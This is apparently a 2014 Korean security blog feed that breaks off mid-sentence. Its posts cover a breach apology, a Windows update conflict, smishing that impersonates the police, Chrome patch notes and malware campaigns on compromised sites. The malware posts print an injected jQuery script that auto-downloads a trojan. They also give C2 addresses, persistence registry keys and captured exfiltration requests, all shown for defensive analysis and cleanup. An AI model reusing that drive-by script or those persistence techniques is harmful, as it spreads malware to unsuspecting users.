[공지] 개인정보 유출에 대한 사과문

http://groups.pandora.tv/blog/?c=notice&m=notice_view&cate=5&num=896



개인정보 유출에 대해 회원님께 진심으로 사과 드립니다.


판도라TV는 회원님의 소중한 개인정보를 안전하게 보호, 관리하고자 최선의 노력을 다해왔으나 2014년 9월 9일과 9월 17일 이틀간 특정 서버의 외부 해킹 흔적을 발견하였고, 피해 예방 및 조속한 대처를 위해 방송통신위원회 등 관계기관에 신고 및 조사를 의뢰 하였습니다. 이에 따른 안내 및 사과의 말씀을 드립니다.


유출된 것으로 추정되는 개인정보는 [아이디], [이름], [암호화된 비밀번호], [생년월일], [주소], [이메일], [휴대폰번호] 등 7개 항목 중 일부 혹은 전체입니다.


이번 해킹에 다른 정보 유출 과정 중, 주민등록번호는 당사가 가입 시 수집하지 않기 때문에 일체의 유출이 없었고, 비밀번호 또한 단방향 암호화가 되어 있어 비밀번호 유출로 인한 직접적인 피해는 없을 것임을 확실하게 말씀 드립니다. 문의 및 피해신고는 판도라TV 고객센터 메일 (cs@pandora.tv)로 연락 주시면 성심 성의껏 답변 드리겠습니다.


향후 이러한 정보 유출 사고의 재발 방지를 위해 관련 업무 과정의 재검토 및 강화조치와 더불어 담당자들의 개인정보 보호업무에 대한 교육을 강화하겠습니다.


판도라TV를 아껴주시는 회원님께 다시 한 번 깊은 사과의 말씀을 드리며, 앞으로 내부 보안관리체계를 더욱 강화하고, 회원님의 소중한 개인정보를 보호하는 데 만전을 기하여 다시는 이러한 일이 발생하지 않도록 최선을 다하겠습니다.


2014년 10월 13일


판도라TV 임직원 일동


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.





금일 진행 된 2014년 10월 보안 업데이트 패치 후 안랩 일부 제품에서 업데이트 및 실행 오류가 나오고 있다고 한다.


※ 추가 내용 (2014-10-21)

마이크로 소프트에서도 해당 문제를 인지하고 패치에 나선 듯 합니다.

Microsoft 보안 권고 2949927 관련 안내



안녕하십니까.


Microsoft는 2014년 10월 15일(한국시각)에 발표된 보안 권고 2949927 설치 후 일부 환경에서 문제가 발생되는 것을 확인하고, Microsoft 다운로드 센터에서 KB2949927 업데이트를 삭제하고 문제점을 조사 중에 있습니다.


Microsoft 보안 권고 2949927 - Windows 7 및 Windows Server 2008R2에 대한 SHA-2 해싱 알고리즘의 사용 가능


Windows 7 또는 Windows Server 2008 R2에 KB2949927 업데이트 설치 후 문제가 발생하는 고객은 아래 방법을 이용하여 이 업데이트를 삭제하시기 바랍니다.  

 

[방법1] 프로그램 추가/제거에서 KB2949927 삭제 방법 

 1.설치된 업데이트를 열려면 시작 단추 , 제어판, 프로그램, 프로그램 및 기능을 차례로 클릭한 다음 설치된 업데이트 보기를 

클릭합니다. 

 2.제어판 클릭, 프로그램 및 기능 클릭, 설치된 업데이트 보기 메뉴를 클릭합니다.

 3.업데이트 설치 제거 목록 중 "Microsoft Windows (KB2949927)에 대한 보안 업데이트" 를 선택하고 제거 클릭합니다.

    관리자 암호를 묻거나 확인하는 메시지가 표시되면 암호를 입력하거나 확인을 제공합니다.

 4.KB2949927 제거 완료 후 재 부팅합니다.

 

[방법2] 명령어로 KB2949927 삭제 방법

 1.시작 단추 클릭한 후, 프로그램 및 파일 검색란에 cmd  입력 후 엔터키를 누릅니다.

 2.명령프롬프트 창이 실행되면, 아래 명령어를 입력합하고 엔터키를 누릅니다.

      wusa.exe /uninstall /kb:2949927

   관리자 암호를 묻거나 확인하는 메시지가 표시되면 암호를 입력하거나 확인을 제공합니다.

 3. KB2949927 제거 완료 후 재 부팅합니다.


보다 자세한 내용은 아래 문서들을 살펴보시기 바랍니다.


Availability of SHA-2 Hashing Algorithm for Windows 7 and Windows Server 2008 R2

https://technet.microsoft.com/en-us/library/security/2949927 


Microsoft Security Advisory: Availability of SHA-2 hashing algorithm for Windows 7 and Windows Server 2008 R2: October 14, 2014

https://support.microsoft.com/kb/2949927/en


감사합니다

마이크로소프트 고객지원부




이에 안랩에서는 아래와 같은 공지를 홈페이지에 기재하였다.


안랩 제품을 사용하는 분들은 아래의 공지에 따라 "KB2949927" 업데이트를 삭제 하시기 바란다.


□ 원본보기 : http://www.ahnlab.com/kr/site/support/notice/noticeView.do?board_seq=50121683

[공지] Windows 업데이트 후 제품 오류 해결방법


안녕하세요? (주)안랩입니다. 


10월 15일(수) 오전부터 Microsoft Windows 업데이트 항목 중 ‘KB2949927’ 내역이 설치 된 경우

안랩 일부 제품에서 업데이트 및 실행 오류현상이 발생하고 있습니다. 


안랩은 현재 Microsoft 에 문제 확인 중에 있으며,

제품에서 발생하는 오류 문제 해결을 위해 아래와 같이 안내 드립니다.


ㅇ 해당 문제 발생 OS: 

- Windows 7, Windows Server 2008 R2 


ㅇ 대상제품: 

- V3 전체 제품군

- APC 전체 제품군 

- 내PC지키미 (무료버전)

- AOS

- TrusLine/ EPS

- TrusWatcher(MDS) Agent 


ㅇ 오류현상:

- Windows 업데이트 이후 안랩제품 업데이트 실패 및 실행 오류 현상


ㅇ 해결방법: 

- 제어판 > 프로그램 및 기능 > 설치된 업데이트 보기 > 목록에서 'KB2949927' 항목선택

   > 마우스 우클릭 '제거' 선택 > 삭제


안랩은 고객 여러분의 제품 이용에 불편이 없도록 최선을 다하겠습니다.

감사합니다.


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




9월달에 확인 된 스미싱 문자 중에서 "사용자 정보(통신사,휴대전화번호,주민등록번호)"를 입력해야 악성 어플리케이션이 다운로드 

되는 경우가 확인되었다.


이전에 소개했던 캡챠 코드(CAPTCHA)를 이용한 유포 방식과 비슷한 양상이다.

보안업체 및 스미싱 탐지 어플리케이션을 우회하려고 의도적으로 만든 것이다.


그래도 이렇게 꾸준하게 변하는 애들은 그나마 보안업체 및 스미싱 탐지 어플리케이션을 신경쓰고 있다는 것이니 기분은 나쁘지 않다.

(니놈들 때문에 우리도 꾸준히 성장한다!!)


아래의 내용은 실제 스미싱 문자를 수신받은 문자 내용이다.

- 임OO귀하의 민사소송건이 접수되었으니 확인바랍니다. http://me2.do/GXo9B5RL

 ㄴ http://me2.do/GXo9B5RL

 ㄴ http://police.cq.co.kr/

 ㄴ http://police.cq.co.kr/file998.php

 ㄴ http://police.cq.co.kr/autonum.php

 ㄴ http://police.cq.co.kr/010-1111-1111/android..apk (입력한 전화번호가 폴더로 생성되며 이후 APK 파일을 다운로드)


※ 현재는 링크가 모두 차단되어 Full URL 공개!!



경찰청에서도 해당 스미싱 유포에 대해 공지를 하였다.


실제 사이트에 접속을 하면 아래와 같이 "서울지방경찰청"을 사칭하였으며, 사용자에게 "통신사, 휴대전화번호, 주민등록번호"

등을 기재하게 만든다.




모든 기재가 완료 되면, 사용자에게 android..apk 파일을 떨궈 준다.



사용자가 입력 한 정보는 제작자가 만들어 둔 autonum.php 서버로 전달 된다.

POST /autonum.php HTTP/1.1

Host: police.cq.co.kr

Connection: keep-alive

Content-Length: 67

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://police.cq.co.kr

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.101 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://police.cq.co.kr/file998.php

Accept-Encoding: gzip,deflate

Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4,und;q=0.2


tel=skt&tel2=010&tel2-1=1111&tel2-2=1111&card1=880303&card2=1112568



실제 다운로드 된 악성 어플리케이션 android..apk 는  알약 안드로이드에서 "Trojan.Android.KRBanker" 로 탐지 하고 있다.

블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.



Google Chrome 브라우저가 38.0.2125.101 정식 버전으로 업데이트 되었습니다.


이번 38버전에서는 보안취약점도 보안 되었지만, 기능적인 부분도 추가 되었습니다.

- A number of new apps/extension APIs (새로운 앱과 확장 API)

- Lots of under the hood changes for stability and performance (안전성과 성능 변화)


취약점에 영향을 받는 낮은 버전 제품 사용시 악성코드 감염 등 보안 위협에 쉽게 노출될 수 있으니, 

해당 제품을 사용하시는 사용자들은 최신 버전으로 업데이트 후 사용하시기 바랍니다.


이번 보안 업데이트는 1건의 Critical 등급, 6건의 High 등급,  4건의 Medium 등급, 1건의 Low 등급 등 총 159건의 보안 취약점이 

업데이트 되었네요.

- Google Chrome 38.0.2125.101 패치 내용

■ Critical CVE-2014-3188 : A special thanks to Juri Aedla for a combination of V8 and IPC bugs that can lead to remote code execution outside of the sandbox. 

■ High CVE-2014-3189 : Out-of-bounds read in PDFium

■ High CVE-2014-3190 : Use-after-free in Events

■ High CVE-2014-3191 : Use-after-free in Rendering

■ High CVE-2014-3192 : Use-after-free in DOM

■ High CVE-2014-3193 : Type confusion in Session Management

■ High CVE-2014-3194 : Use-after-free in Web Workers

■ Medium CVE-2014-3195 : Information Leak in V8

■ Medium CVE-2014-3196 : Permissions bypass in Windows Sandbox

■ Medium CVE-2014-3197 : Information Leak in XSS Auditor

■ Medium CVE-2014-3198 : Out-of-bounds read in PDFium

■ Low CVE-2014-3199 : Release Assert in V8 bindings


- 내부 보안 취약점 패치 내용

■ CVE-2014-3200: Various fixes from internal audits, fuzzing and other initiatives (Chrome 38)



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



기존의 사이트 변조는 InternetExplorer, Adobe Flash Player, Java Exploit 등 소프트웨어의 취약점 방식을 이용하여 

접속 된 PC가  취약점이 존재 할 시 특정 파일을 받게 되는 드라이브 바이 다운로드(Drive-by-Download)방식이 대부분 이였다.


그래서 이전에 기존 사이트 변조와는 다른 iframe, Document.Referrer, Meta http-equiv="refresh"  함수를 이용한 

악성코드 다운로드 방식을 소개 한 적이 있었다.


이번에 확인 된 내용은 기존의 html 함수를 쓰지 않고, JQuery 함수를 이용하여 EXE 파일을 다운로드 시키고 있다.

(해당 내용은 9월 24일에 발견 된 내용이나, 포스팅이 늦었다 ㅡ.ㅡ;;)


특히 이전 포스팅에서 윈티비24(Wintv24) 사이트가 변조되어 악성코드가 유포에 대해 기재한 적이 있는데,

이번에 카스게임(cassgam.com)에서 발견 된 파일도 윈티비24(Wintv24)사이트 변조와 동일한 제작자가 유포 한 것으로 추측된다.


□ 관련 내용


그럼 간단하게 이번 방식에 대해서 알아보자.

우선 실제 유포가 되고 사이트를 한번 확인해 볼 필요가 있다.


분석중에 알아낸 사실이지만, 해당 사이트는 로그인 기능이 전혀 동작되지 않으며 악성코드 유포를 위해 만들어진 

전형적인 허위 사이트이다.


암튼 유포 되었던 카스게임(cassgam.com)사이트에는 아래와 같은 스크립트가 삽입되어 있었다.

(※ 파일 수집은 9월 24일에 이루어져있고, 현재는 변조 된 스크립트는 삭제 되었음을 미리 알림!!)

전체적인 인터넷 흐름은 아래와 같다.

hxxp://cassgam.com

hxxp://cassgam.com/top.html

hxxp://cassgam.com/jquery.js

hxxp://cassgam.com/cass.html


이 중에서 top.html 속에 제이쿼리(JQuery)함수를 이용하여 EXE를 다운로드 시키는 스크립트가 포함되어 있다.


- top.html 내용

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />

<title>::: CASS :::</titl</title>

<script src="jquery.js"></script>

<script type="text/javascript">

    $(document).ready(function () { window.open('cassgameInstaller.exe', '_self', '', true); });

  </script>

</head>

<body>

</body>

</html>


해당 스크립트에서 가장 중요한 부분은 JQuery를 사용한 $(document).ready(function ()) 부분과
EXE 파일을 다운로드 시키는 window.open() 함수이다.

Window.open() 함수는 새로운 창에서 URL을 생성할 때 사용되는 함수이다.

Window.open(URL, name, specs,replace)와 같은 형식을 갖게 된다.
- URL 파라미터값은 말그대로 URL 주소이다.
- _self specs 파라미터값은 현재페이지에서 URL을 연결 하는 것을 뜻한다.
- ture 파라미터값은 URL 히스토리 목록에 현재 문서 저장 안함을 뜻한다.

따라서, hxxp://cassgam.com/top.html 에 접속하면 "hxxp://cassgam.com/cassgameInstaller.exe" 파일을 다운로드 한다.
(cassgameInstaller.exe 파일은 ESTSoft ALYac에서 Trojan.Dropper.DDoS.Agent.ulo 로 탐지 된다.)


아래의 스크린샷은 실제 카스게임(cassgam.com)에 접속 했을 때의 화면이다.




스크립트를 통해 사용자에게 설치 되는 악성파일(cassgameInstaller.exe)의 행위는 아래와 같다.

- 악성행위

정상적인 svchost.exe 프로세스에 인젝션되어 동작되며, 

원격데스크탑 조작, 사용자 정보 탈취, DDoS, 화면 캡쳐 등 전형적인 NetBot Client의 역활을 수행한다.


- 파일 생성

C:\WINDOWS\system32\RtmqtrC.dll (ESTSoft ALYac : Trojan.DDoS.Agent.ulo)


- 레지스트리 생성

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4


- 서버 접속

180.210.53.113:15963


- 감시 프로세스

PMangAgent.exe

SUTDA.exe

POKER.exe

LASPOKER.exe

marpoker.exe

HOOLA3.exe

HIGHLOW2.exe

BADUKI.exe

POKER7.exe


- 보안 프로그램 설치여부

이스트소프트 알약

레지스트리 : HKEY_LOCAL_MACHINE\SOFTWARE\ESTsoft\ALYac "RootDir"

프로세스 :  AYUpdate.aye


안랩 V3 Lite

레지스트리 : HKEY_LOCAL_MACHINE\SOFTWARE\Ahnlab\V3Lite "InstallPath"

프로세스 : MUpdate2.exe




블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.





국내 대표적인 메신저인 네이트온(NateOn)이 5.1.12.0 으로 업데이트 되었다.


원래 네이트온 업데이트는 포스팅을 하지 않지만, 이번 업데이트로 인해 적용 된 기능 중 수정해야 할 내용이 있어서 잠시 써본다.


우선 이번 네이트온(NateOn)이5.1.12.0의 내용은 아래와 같다.


- 네이트온 5.1.12.0 업데이트 안내 : http://www.cyworld.com/nateonblog

(※ 아직 블로그에는 업데이트 내용이 공지되지 않았음)

네이트온이 5.1.12.0 버전으로 업데이트 되었습니다


▶▶ 네이트온 5.1.12.0 기능 개선 안내 ◀◀

  ● 프랭클린플래너 플러그인 적용

  ● 클립보드 이미지 ctrl+v로 파일 전송 기능 적용

  ● 서비스탭 메뉴 개선

  ● 이름이 긴 계정의 말줄임 처리 적용

  ● 정보쪽지 말풍선 UI 개선

  ● 한번메시지 보낸 파일함 목록 비노출 적용

  ● 기타 사용성 수정


자세한 내용은 네이트온 블로그를 참조해주세요.

(http://www.cyworld.com/nateonblog)


고객님들의 소중한 의견은 꾸준히 수렴하여

개선해 나가도록 하겠습니다.

고맙습니다.




이번 업데이트 기능 중 내가 수정해야 한다고 이야기하는 부분은 "클립보드 이미지 ctrl+v로 파일 전송 기능 적용" 이 부분이다.


이 기능은 클립보드에 있는 이미지를 다른 사용자에게 Ctrl + C, V로 보내는 기능이다.


쉽게 이야기해서 이전에는 상대방에게 이미지를 보내려면 이미지 자체를 저장해서 파일로 전송해야하는데,

이번 업데이트를 통해 이미지를 저장하지 않아도 웹상에서 이미지복사(또는 Ctrl + C 또는 이미지 프로그램으로 캡쳐 한 이미지)를 

한 후 Ctrl + V 를 하면 상대방에게 전달 되는 기능이다.


아주 편리한 기능이라고 볼 수 있다.


하지만!!!


왜 다른 사용자에게 보낸 이미지를 "네이트온 저장 폴더"에 자동으로 저장을 하는지 모르겠다.

클립보드에 있는 이미지만 보내고 끝내야지, 내 PC에 저장하는 건 뭔가 이상하다.


이해하기 쉽도록 이미지로 설명을 한다.

설명은 수정해야 할 내용과, 클립보드 이미지 ctrl+v로 파일 전송 기능의 사용법을 동시에 설명한다.


1. 다른 사용자에게 보낼 이미지 복사하자.

나는 알약의 "알약 안심 케어" 라는 이미지를 웹상에서 복사했다.



clipbrd 명령어를 통해 현재 클립보드에 저장 되어 있는 내용이 무엇인지 확인해보자.

(※ clipbrd 명령어는 Windows 7에서는 동작하지 않으며, Windows XP에서만 실행창을 통해 확인이 가능하다)

클립보드에는 이전에 복사 해둔 알약 안심케어 이미지가 복사되어 있다.


2. 이미지를 보낼 사용자 대화창에서 Ctrl + V를 실행

대화창에서 Ctrl + V를 실행하면 아래와 같이 "이미지 전송하기" 팝업창이 뜬다.

아직 난 확인을 누르지 않은 상태이다.



이때 "네이트온 다운로드 폴더"에 내가 보낼 이미지가 자동으로 생성되어 있는 것을 알 수 있다.

왜 이 파일을 만드는지 모르겠으며, 수정이 되어야 할 부분이라 생각한다.


개인적으로 생각을 해보면 현재 네이트온 프로그램 전달 로직 상 이전과 같이 이미지 파일을 저장하고 전달하는 방식을 

버릴 수가 없기 때문에 이렇게 파일을 자동으로 저장한 후 상대방에게 자동으로 보내는 기능으로 밖에 생각이 안된다.


3. 이미지 전송하기 팝업에서 "확인"을 누르면 아래와 같이 쉽게 이미지를 상대방에게 전달 할 수 있다.



테스트에 도움 주신 "울지않는 벌새" 님 감사합니다(__)

블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




국내에서 운영중인 스포츠 배팅 정보 및 동영상을 제공하는 윈티비24(Wintv24)에서 사이트 변조로 인한 악성코드가 유포되었다.


해당 사이트는 9월 13일부터 악성코드를 배포 하고 있었으며, 아래와 같은 스크립트를 통해 사용자에게 악성파일이 다운로드되어

설치되고 있었다.

hxxp://www.wintv24.com/data/win.htm (9월 13일)

ㄴhxxp://www.wintv24.com/data/win_24.exe


hxxp://www.wintv24.com/data/file/notice/win.htm (9월 16일 ~ 17일)

ㄴhxxp://www.wintv24.com/data/file/notice/win_24.exe


hxxp://www.wintv24.com/data/file/laddder/win.htm (9월 18일)

ㄴhxxp://www.wintv24.com/data/file/laddder/win_24.exe


hxxp://www.wintv24.com/data/file/notice/win.htm (9월 19일)

ㄴhxxp://www.wintv24.com/data/file/notice/vv3.exe


hxxp://bit.ly/1v0CroF (9월 20일)

ㄴhxxp://sniffer1.ddns.info/lsk.js

 ㄴhxxp://sniffer1.ddns.info/win.htm

 ㄴhxxp://sniffer1.ddns.info/wintv_update.exe


※ 모든 링크가 삭제되어 Full URL 공개



윈티비24(Wintv24)와 관련 된 내용은 아래 링크에서 자세하게 확인 할 수 있다.



스크립트를 통해 사용자에게 설치 되는 악성파일의 행위는 아래와 같다.

- 파일 생성

C:\Windows\Winpcapture.exe (Alyac : Spyware.Infostealer.Win24)


- 레지스트리 생성

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

"Shell" = "Explorer.exe C:\Windows\Winpcapture.exe"


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{4f645220-306d-11d2-995d-00c04f98bbc9}

"StubPath" = "C:\WINDOWS\Winpcapture.exe"


- 서버 접속

sniffer1.ddns.info(103.1.249.204:80)


- 보안프로그램 종료

아래와 같은 경로의 보안프로그램 Uninstall 기능을 통해 삭제 시킨다.

C:\Program Files\AhnLab\V3Lite30\Uninst.exe

C:\Program Files\ESTsoft\ALYac\unins000.aye



이외에도 악성 파일이 설치 된 후 윈티비24(Wintv24) 사이트에서 로그인을 할 시 사용자 계정과 암호를 탈취 한다.

(※ 테스트 시 ID는 testadmin, Password는 1212를 사용하였다.)


사이트에서 로그인을 시도 할 시 아래와 같이 Base64로 암호화 하여 자기 서버로 전달 시킨다.


Base64 암호화 내용은 Malziila 프로그램을 사용하여 디코딩 시 아래와 같이 사용자 정보(ID/Pass)를 가져간 것을 알 수 있다.


제작자가 사용한 서버(sniffer1.ddns.info)는 일본에 위치 한 것으로 파악 된다.


해당 서버에 접속을 해보니, "Merong~~~~:p" 라는 문구가 들어온다.

이런 ㅅㅂㄴㅇㅅㄲ !!


또 한가지 확인 된 사실은, 

윈티비24(Wintv24) 사이트에서 정상적인 로그인 시 암호화도 하지 않고 바로 서버로 사용자 정보를 넘겨주고 있었다.

(차라리 악성코드 제작자가 웹사이트를 맡는 편이...;; 그래도 악성코드 제작자는 Base64로 암호화라도 했음 ㅋㅋ)

POST /bbs/login_check.php HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*

Referer: http://wintv24.com/bbs/login.php

Accept-Language: ko

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: wintv24.com

Content-Length: 69

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: PHPSESSID=pcatf8bpcsqs3d14b6v9l2lt82; f33d2ed86bd82d4c22123c9da444d8ab=MTQxMTM2NjYzOA%3D%3D; 

2a0d2363701f23f8a75028924a3af643=MTEyLjIxNy4yMDUuMTU0; 96b28b766b7e0699aa91c9ff3d890663=aHR0cDovL3dpbnR2MjQuY29tLw%3D%3D


url=%252Fbbs%252Flogin.php&mb_id=testadmin&mb_password=1212&x=17&y=32




* 악성파일 실행 후 부팅이 안되는 정보 추가

악성파일이 실행 된 후 재부팅을 하게 되면, 레지스트리의 버그로 인하여 OS 부팅이 불가능하게 된다.


재부팅이 되면 아래와 같은 화면이 지속적으로 보여주며, 정상적인 부팅이 이루어지지 않는다.

(해당 스크린샷은 Windows XP에 대한 화면이다)



이를 해결 하기 위해서는 안전모드(네트워크 사용)을 통해 부팅 하여 아래의 파일을 다운로드 후 돌려주시면 된다.

안전모드로 접근하는 방법은 [Tip]안전모드로 부팅하기 를 통해 쉽게 할 수 있다.


해결 방법은 Windows XPWindows 7 방법이 있으니, 각자 자신의 OS에 맞게 치료하면 된다.

■ 윈티비24(Wintv24) 악성코드 Winpcapture.exe 치료 방법 (Windows XP 전용) ■ 


Auto Cure.bat



1. 안전모드 부팅 후 아래의 파일을 다운로드 한다.

http://kjcc2.tistory.com/attachment/cfile3.uf@243458485420C02407CB34.bat


2. 파일 실행


3. 재부팅



■ 윈티비24(Wintv24) 악성코드 Winpcapture.exe 치료 방법 (Windows 7 전용) ■ 


Windows 7은 안전모드 부팅 시 "안전모드(네트워크 사용)"으로 접근 시 부팅이 안되기 때문에

"안전모드(명령 프롬프트)" 로 접속해서 아래의 명령어들을 사용하여 사용자가 직접 입력해야 한다.



부팅이 되면 아래와 같은 명령 프롬프트 모드에서 아래의 명령어를 치고, 재부팅 하면 된다.


1. 파일 삭제

del C:\Windows\Winpcapture.exe


2. 레지스트리 삭제 및 수정(각각 1개씩 다 입력해야 한다)

reg delete "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{4f645220-306d-11d2-995d-00c04f98bbc9}" /v "StubPath" /f


reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /f


reg add  "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t "REG_SZ" /d "explorer.exe" /f


3. 재부팅

shutdown -r -f -t 0


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




국민 보안 프로그램 알약(ALYac)에서 운영하는 알약 블로그에서는 리그 익스플로잇(RIG Exploit Kit) 공격도구를 통한 

악성코드 유포 주의에 대한 글을 포스팅 하였다.


좀 더 자세한 내용을 적고 싶지만, 현재 시간이 새벽 2시 30분이라....;;

내일 간단하게 나마 리그 익스플로잇(RIG Exploit Kit)에 대한 내용을 적어보도록 하겠다.


■ 관련 내용


원본 보기 : http://blog.alyac.co.kr/155

안녕하세요? 알약대응팀입니다.


일명 리그 익스플로잇 킷(RIG Exploit Kit)이라고 불리는 '보안취약점을 악용한 악성코드 유포도구'가 2014년 08월 26일부터 국내 웹 사이트를 통해서도 공격에 활용된 정황이 다수 목격되고 있습니다.


리그 익스플로잇 킷은 2014년 중순 경 주로 해외에서 공격사례가 보고된 바 있었지만 국내에서는 널리 알려진 종류는 아닙니다. 그런 가운데 기존 한국 맞춤형 인터넷 뱅킹 악성코드 유포조직이 리그 익스플로잇 킷 도구를 도입해 국내에 랜섬웨어, 파밍, RAT 악성코드 유포에 본격적으로 활용하기 시작하였습니다.



그 동안 국내에서 사용된 보안취약점 공격방식은 공격 스크립트 형태가 상대적으로 단순하고 추적이 용이한 상태이지만, 리그 익스플로잇 킷은 분석을 방해하기 위한 난독화 부분이 강화되었고, PHP 세션 아이디(PHPSSESID)값을 통해서 호출과 응답을 이용하는 특징이 있습니다.



더불어 마이크로소프트사의 실버라이트 취약점도 함께 이용될 수 있기 때문에 이용자들은 최신 버전으로 업데이트하여 사용하시길 권장드립니다.



[RIG Exploit Kit 대표 취약점]

- Microsoft Internet Explorer Use-After-Free Remote Code Execution Vulnerability (CVE-2013-2551)

- Microsoft Internet Explorer Use-After-Free Remote Code Execution Vulnerability (CVE-2014-0322)

- Adobe Flash Player Remote Code Execution Vulnerability (CVE-2014-0497)

- Microsoft Silverlight Double Deference Remote Code Execution Vulnerability (CVE-2013-0074)

- Oracle Java SE Memory Corruption Vulnerability (CVE-2013-2465)

- Oracle Java SE Remote Java Runtime Environment Code Execution Vulnerability (CVE-2012-0507)




알약에서는 현재 보고되고 있는 악성코드들에 대해 아래와 같이 탐지중에 있습니다.


Trojan.Dropper.KRBanker.csrss

Spyware.KRBanker.csrss

Trojan.Ransom.Critroni.A



현재 계속적으로 모니터링을 진행하면서 DB업데이트를 진행하고 있으며, 이용자분들은 항시 알약의 DB를 최신버전을 유지해 주시길 당부 드립니다.


감사합니다.


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.




Google Chrome 브라우저가 37.0.2062.94 정식 버전으로 업데이트 되었습니다.

이번 37버전에서는 보안취약점도 보안되었지만, 기능적인 부분도 추가 되었습니다.


- DirectWrite support on Windows for improved font rendering (윈도우 폰트 랜더링 향상을 위한 DirectWrite 지원)

- A number of new apps/extension APIs (새로운 앱과 확장 API)

- Lots of under the hood changes for stability and performance (안전성과 성능 변화)



취약점에 영향을 받는 낮은 버전 제품 사용시 악성코드 감염 등 보안 위협에 쉽게 노출될 수 있으니, 

해당 제품을 사용하시는 사용자들은 최신 버전으로 업데이트 후 사용하시기 바랍니다.


이번 보안 업데이트는 2건의 Critical 등급, 4건의 High 등급,  3건의 Medium 등급 등 총 50건의 보안 취약점이 업데이트 되었네요.

 Google Chrome 37.0.2062.94 패치 내용

- Critical CVE-2014-3176, CVE-2014-3177 : A special reward to lokihardt@asrt for a combination of bugs in V8, IPC, sync, and extensions that can lead to remote code execution outside of the sandbox

- High CVE-2014-3168 : Use-after-free in SVG

- High CVE-2014-3169 : Use-after-free in DOM

- High CVE-2014-3170 : Extension permission dialog spoofing

- High CVE-2014-3171 : Use-after-free in bindings

- Medium CVE-2014-3172 : Issue related to extension debugging

- Medium CVE-2014-3173 : Uninitialized memory read in WebGL

- Medium CVE-2014-3174 : Uninitialized memory read in Web Audio



 내부 보안 취약점 패치 내용

- CVE-2014-3175 : Various fixes from internal audits, fuzzing and other initiatives (Chrome 37)



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 

블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.


Google Chrome 브라우저가 36.0.1985.143 버전으로 업데이트 되었습니다.


취약점에 영향을 받는 낮은 버전 제품 사용시 악성코드 감염 등 보안 위협에 쉽게 노출될 수 있으니, 

해당 제품을 사용하시는 사용자들은 최신 버전으로 업데이트 후 사용하시기 바랍니다.


이번 보안 업데이트는 2건의 High 등급 등 총 12건의 보안 취약점과

자체 내장 된 Adobe Flash Player 14.0.0.177 버전이 업데이트 되었네요.

- Google Chrome 36.0.1985.143 패치 내용

■ High CVE-2014-3165 : Use-after-free in web sockets

■ High CVE-2014-3166 : Information disclosure in SPDY


- 내부 보안 취약점 패치 내용

■ CVE-2014-3167 : Various fixes from internal audits, fuzzing and other initiatives.



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




2014년 08월 11일 [인터넷침해대응센터(KrCert)] 에서 경보단계를 "관심"으로 발령하였다.
항상 보안 프로그램을 최신으로 업데이트 하시고, 1차적으로 실시간 감시를 On 하시길!!

■ 개요
 - 8.15 한일 사이버전, 2014 을지연습(8.18~8.21) 실시에 따른 사이버공격 발생 가능성 대비
 - 8월 11일 (월) 10:00시부로 사이버위기 경보 '관심' 단계 발령
    ※ 사이버위기 경보 단계는 ‘정상→관심→주의→경계→심각’으로 구분

■ 대응
 - 악성코드 감염으로 인한 피해를 입지 않도록 MS 윈도우, 백신프로그램 등의 최신 보안업데이트 적용 유지
 - 출처가 불분명한 이메일 및 불건전 홈페이지를 통한 감염 피해를 입지 않도록 주의

■ 문의
- 전화 : 국번없이 118


- 인터넷침해대응센터(KrCert) 경보 단계 안내

블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




세계 최대 쇼핑몰인 [아마존]에서 서비스하는 Amazon Web Services(AWS)서버를 이용한 스미싱이 유포되고 있는 것이 

